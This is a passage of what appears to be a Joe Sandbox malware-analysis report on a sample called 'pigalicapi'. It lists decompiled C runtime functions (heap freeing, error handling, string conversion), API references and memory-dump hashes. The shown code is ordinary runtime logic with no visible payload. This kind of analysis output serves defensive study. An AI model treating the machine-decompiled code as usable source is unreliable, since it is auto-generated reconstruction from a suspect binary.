                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: GetLastError.KERNEL32(?,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?,?), ref: 00EFA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBC8E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBC99
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBCED
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBCF8
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBD03
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBD0E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                    • Instruction ID: fc6ebd2cabf4be8617b0989ec198095fa2edb8965025d735064c0dacab19233f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C118E71940B0CAAD620BBB1CC07FEB77DCAF10740F481824B3DEBA05ADB65F5499651
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E00EFF424(void* __ecx) {
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if( *0xf8dda0 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_t25 = GetLastError();
                                                                                                                                                                                                                                                    					_t11 = E00F0069E(__eflags,  *0xf8dda0);
                                                                                                                                                                                                                                                    					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                    					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                                    						_t11 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__eflags = _t11;
                                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                                    							_t4 = E00F006D8(__eflags,  *0xf8dda0, 0xffffffff);
                                                                                                                                                                                                                                                    							_pop(_t16);
                                                                                                                                                                                                                                                    							__eflags = _t4;
                                                                                                                                                                                                                                                    							if(_t4 != 0) {
                                                                                                                                                                                                                                                    								_t28 = E00EFA67D(_t16, 1, 0x28);
                                                                                                                                                                                                                                                    								__eflags = _t28;
                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                    									_t11 = 0;
                                                                                                                                                                                                                                                    									E00F006D8(__eflags,  *0xf8dda0, 0);
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									__eflags = E00F006D8(__eflags,  *0xf8dda0, _t28);
                                                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                                                    										_t11 = _t28;
                                                                                                                                                                                                                                                    										_t28 = 0;
                                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								E00EFA6DA(_t28);
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					SetLastError(_t25);
                                                                                                                                                                                                                                                    					return _t11;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                    0x00eff42b
                                                                                                                                                                                                                                                    0x00eff43e
                                                                                                                                                                                                                                                    0x00eff445
                                                                                                                                                                                                                                                    0x00eff448
                                                                                                                                                                                                                                                    0x00eff44b
                                                                                                                                                                                                                                                    0x00eff464
                                                                                                                                                                                                                                                    0x00eff464
                                                                                                                                                                                                                                                    0x00eff44d
                                                                                                                                                                                                                                                    0x00eff44d
                                                                                                                                                                                                                                                    0x00eff44f
                                                                                                                                                                                                                                                    0x00eff459
                                                                                                                                                                                                                                                    0x00eff45f
                                                                                                                                                                                                                                                    0x00eff460
                                                                                                                                                                                                                                                    0x00eff462
                                                                                                                                                                                                                                                    0x00eff472
                                                                                                                                                                                                                                                    0x00eff476
                                                                                                                                                                                                                                                    0x00eff478
                                                                                                                                                                                                                                                    0x00eff48c
                                                                                                                                                                                                                                                    0x00eff48c
                                                                                                                                                                                                                                                    0x00eff495
                                                                                                                                                                                                                                                    0x00eff47a
                                                                                                                                                                                                                                                    0x00eff488
                                                                                                                                                                                                                                                    0x00eff48a
                                                                                                                                                                                                                                                    0x00eff49e
                                                                                                                                                                                                                                                    0x00eff4a0
                                                                                                                                                                                                                                                    0x00eff4a0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eff48a
                                                                                                                                                                                                                                                    0x00eff4a3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eff462
                                                                                                                                                                                                                                                    0x00eff44f
                                                                                                                                                                                                                                                    0x00eff4ab
                                                                                                                                                                                                                                                    0x00eff4b5
                                                                                                                                                                                                                                                    0x00eff42d
                                                                                                                                                                                                                                                    0x00eff42f
                                                                                                                                                                                                                                                    0x00eff42f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00EFF41B,00EFE807), ref: 00EFF432
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EFF440
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EFF459
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00EFF41B,00EFE807), ref: 00EFF4AB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 2e7533c6965ebfc8c9b3f141eecbb6d8dbfdc59f9e983de0c064215a4aa561db
                                                                                                                                                                                                                                                    • Instruction ID: dc2c37ac3501c1445c6c19deceb3fa4bd544a76d48acc677ff2e9f2fb8f26a06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e7533c6965ebfc8c9b3f141eecbb6d8dbfdc59f9e983de0c064215a4aa561db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001D43321A32D5EE7682B74AC869B73798EF417B9760433AFA34A50E5EF524C01B254
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                                    			E00EF9C30(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				intOrPtr _t2;
                                                                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t29 = __edx;
                                                                                                                                                                                                                                                    				_t23 = __ecx;
                                                                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                                                                    				_t36 = GetLastError();
                                                                                                                                                                                                                                                    				_t2 =  *0xf8d70c; // 0x2
                                                                                                                                                                                                                                                    				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                    				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					_t3 = E00EFA67D(_t23, 1, 0x364);
                                                                                                                                                                                                                                                    					_t31 = _t3;
                                                                                                                                                                                                                                                    					_pop(_t25);
                                                                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                                                                    						_t4 = E00EFA92D(_t25, _t36, __eflags,  *0xf8d70c, _t31);
                                                                                                                                                                                                                                                    						__eflags = _t4;
                                                                                                                                                                                                                                                    						if(_t4 != 0) {
                                                                                                                                                                                                                                                    							E00EF9AA2(_t25, _t31, 0xf8df44);
                                                                                                                                                                                                                                                    							E00EFA6DA(0);
                                                                                                                                                                                                                                                    							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                    							__eflags = _t31;
                                                                                                                                                                                                                                                    							if(_t31 == 0) {
                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_push(_t31);
                                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_push(_t3);
                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                    						E00EFA6DA();
                                                                                                                                                                                                                                                    						_pop(_t25);
                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                    						SetLastError(_t36);
                                                                                                                                                                                                                                                    						E00EFA63A(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                    						asm("int3");
                                                                                                                                                                                                                                                    						_push(_t20);
                                                                                                                                                                                                                                                    						_push(_t36);
                                                                                                                                                                                                                                                    						_push(_t31);
                                                                                                                                                                                                                                                    						_t37 = GetLastError();
                                                                                                                                                                                                                                                    						_t21 = 0;
                                                                                                                                                                                                                                                    						_t9 =  *0xf8d70c; // 0x2
                                                                                                                                                                                                                                                    						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                    						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                                    							_t32 = E00EFA67D(_t25, 1, 0x364);
                                                                                                                                                                                                                                                    							_pop(_t27);
                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                    								_t11 = E00EFA92D(_t27, _t37, __eflags,  *0xf8d70c, _t32);
                                                                                                                                                                                                                                                    								__eflags = _t11;
                                                                                                                                                                                                                                                    								if(_t11 != 0) {
                                                                                                                                                                                                                                                    									E00EF9AA2(_t27, _t32, 0xf8df44);
                                                                                                                                                                                                                                                    									E00EFA6DA(_t21);
                                                                                                                                                                                                                                                    									__eflags = _t32;
                                                                                                                                                                                                                                                    									if(_t32 != 0) {
                                                                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										goto L18;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_push(_t32);
                                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_push(_t21);
                                                                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                                                                    								E00EFA6DA();
                                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                                    								SetLastError(_t37);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_t32 = E00EFA8D7(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                    								L19:
                                                                                                                                                                                                                                                    								SetLastError(_t37);
                                                                                                                                                                                                                                                    								_t21 = _t32;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return _t21;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t31 = E00EFA8D7(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						SetLastError(_t36);
                                                                                                                                                                                                                                                    						return _t31;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                    0x00ef9c30
                                                                                                                                                                                                                                                    0x00ef9c30
                                                                                                                                                                                                                                                    0x00ef9c30
                                                                                                                                                                                                                                                    0x00ef9c3a
                                                                                                                                                                                                                                                    0x00ef9c3c
                                                                                                                                                                                                                                                    0x00ef9c41
                                                                                                                                                                                                                                                    0x00ef9c44
                                                                                                                                                                                                                                                    0x00ef9c52
                                                                                                                                                                                                                                                    0x00ef9c59
                                                                                                                                                                                                                                                    0x00ef9c5e
                                                                                                                                                                                                                                                    0x00ef9c61
                                                                                                                                                                                                                                                    0x00ef9c64
                                                                                                                                                                                                                                                    0x00ef9c76
                                                                                                                                                                                                                                                    0x00ef9c7b
                                                                                                                                                                                                                                                    0x00ef9c7d
                                                                                                                                                                                                                                                    0x00ef9c88
                                                                                                                                                                                                                                                    0x00ef9c8f
                                                                                                                                                                                                                                                    0x00ef9c94
                                                                                                                                                                                                                                                    0x00ef9c97
                                                                                                                                                                                                                                                    0x00ef9c99
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9c7f
                                                                                                                                                                                                                                                    0x00ef9c7f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9c7f
                                                                                                                                                                                                                                                    0x00ef9c66
                                                                                                                                                                                                                                                    0x00ef9c66
                                                                                                                                                                                                                                                    0x00ef9c67
                                                                                                                                                                                                                                                    0x00ef9c67
                                                                                                                                                                                                                                                    0x00ef9c6c
                                                                                                                                                                                                                                                    0x00ef9ca7
                                                                                                                                                                                                                                                    0x00ef9ca8
                                                                                                                                                                                                                                                    0x00ef9cae
                                                                                                                                                                                                                                                    0x00ef9cb3
                                                                                                                                                                                                                                                    0x00ef9cb6
                                                                                                                                                                                                                                                    0x00ef9cb7
                                                                                                                                                                                                                                                    0x00ef9cb8
                                                                                                                                                                                                                                                    0x00ef9cbf
                                                                                                                                                                                                                                                    0x00ef9cc1
                                                                                                                                                                                                                                                    0x00ef9cc3
                                                                                                                                                                                                                                                    0x00ef9cc8
                                                                                                                                                                                                                                                    0x00ef9ccb
                                                                                                                                                                                                                                                    0x00ef9cd9
                                                                                                                                                                                                                                                    0x00ef9ce5
                                                                                                                                                                                                                                                    0x00ef9ce8
                                                                                                                                                                                                                                                    0x00ef9ceb
                                                                                                                                                                                                                                                    0x00ef9cfd
                                                                                                                                                                                                                                                    0x00ef9d02
                                                                                                                                                                                                                                                    0x00ef9d04
                                                                                                                                                                                                                                                    0x00ef9d0f
                                                                                                                                                                                                                                                    0x00ef9d15
                                                                                                                                                                                                                                                    0x00ef9d1d
                                                                                                                                                                                                                                                    0x00ef9d1f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9d06
                                                                                                                                                                                                                                                    0x00ef9d06
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9d06
                                                                                                                                                                                                                                                    0x00ef9ced
                                                                                                                                                                                                                                                    0x00ef9ced
                                                                                                                                                                                                                                                    0x00ef9cee
                                                                                                                                                                                                                                                    0x00ef9cee
                                                                                                                                                                                                                                                    0x00ef9d21
                                                                                                                                                                                                                                                    0x00ef9d22
                                                                                                                                                                                                                                                    0x00ef9d22
                                                                                                                                                                                                                                                    0x00ef9ccd
                                                                                                                                                                                                                                                    0x00ef9cd3
                                                                                                                                                                                                                                                    0x00ef9cd7
                                                                                                                                                                                                                                                    0x00ef9d2a
                                                                                                                                                                                                                                                    0x00ef9d2b
                                                                                                                                                                                                                                                    0x00ef9d31
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9cd7
                                                                                                                                                                                                                                                    0x00ef9d38
                                                                                                                                                                                                                                                    0x00ef9d38
                                                                                                                                                                                                                                                    0x00ef9c46
                                                                                                                                                                                                                                                    0x00ef9c4c
                                                                                                                                                                                                                                                    0x00ef9c50
                                                                                                                                                                                                                                                    0x00ef9c9b
                                                                                                                                                                                                                                                    0x00ef9c9c
                                                                                                                                                                                                                                                    0x00ef9ca6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ef9c50

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00EF5EB1,?,?,?,00EF4B88,?), ref: 00EF9C34
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9C67
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9C8F
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 00EF9C9C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 00EF9CA8
                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00EF9CAE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                    • Opcode ID: 78e08d62834cb65ac5edf2669a6642acd0b43d788e7d0bb7e4eb41c23f9310cc
                                                                                                                                                                                                                                                    • Instruction ID: 4ba256307390915b0e7f8e47054eb9844a81f68be81a4af6c0bcd63bee0894c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78e08d62834cb65ac5edf2669a6642acd0b43d788e7d0bb7e4eb41c23f9310cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAF0A47150470C67C6113735AD09BBA36D9AFC17A4B2A6124FB9DFA1D3EF618C02A222
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EFC1FF,00EFA67C,?,00EFC19F,00EFA67C,00F4A700,0000000C,00EFC2F6,00EFA67C,00000002), ref: 00EFC26E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EFC281
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00EFC1FF,00EFA67C,?,00EFC19F,00EFA67C,00F4A700,0000000C,00EFC2F6,00EFA67C,00000002,00000000), ref: 00EFC2A4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 8b811926ed5832942d38cb3e8543f4b392b9df5e86239c7ddd39dbb9938a796c
                                                                                                                                                                                                                                                    • Instruction ID: 0ae0a17b080e8acc99f50a9b500447fc6c621b1ec6ec887e59f82bfc81112c41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b811926ed5832942d38cb3e8543f4b392b9df5e86239c7ddd39dbb9938a796c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF0443160461CBBDB155FA0DD09BEDBFB5FF04715F104154FD09A21A1EBB08944EA91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                                    			E00EFA4FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				void* _v40;
                                                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                                                                    				int _t53;
                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                                                                    				short* _t69;
                                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                                    				short* _t71;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t34 =  *0xf8dd74; // 0x3af7f1ec
                                                                                                                                                                                                                                                    				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                    				E00EF5E73(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                    				_t57 = _a24;
                                                                                                                                                                                                                                                    				if(_t57 == 0) {
                                                                                                                                                                                                                                                    					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                    					_t57 = _t53;
                                                                                                                                                                                                                                                    					_a24 = _t53;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                                                                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                    				_v12 = _t40;
                                                                                                                                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return E00EFDC5F(_v8 ^ _t70);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                                                                                                                                    					_t69 = 0;
                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                    					if(_t69 != 0) {
                                                                                                                                                                                                                                                    						E00EFF070(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                    						if(_t46 != 0) {
                                                                                                                                                                                                                                                    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                                                                    					E00EFA61A(_t69);
                                                                                                                                                                                                                                                    					goto L15;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                                                                                                                                    				_t63 = _t55 + 8;
                                                                                                                                                                                                                                                    				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					_t69 = E00EFBD19(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                    					if(_t69 == 0) {
                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *_t69 = 0xdddd;
                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                    					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                    				}
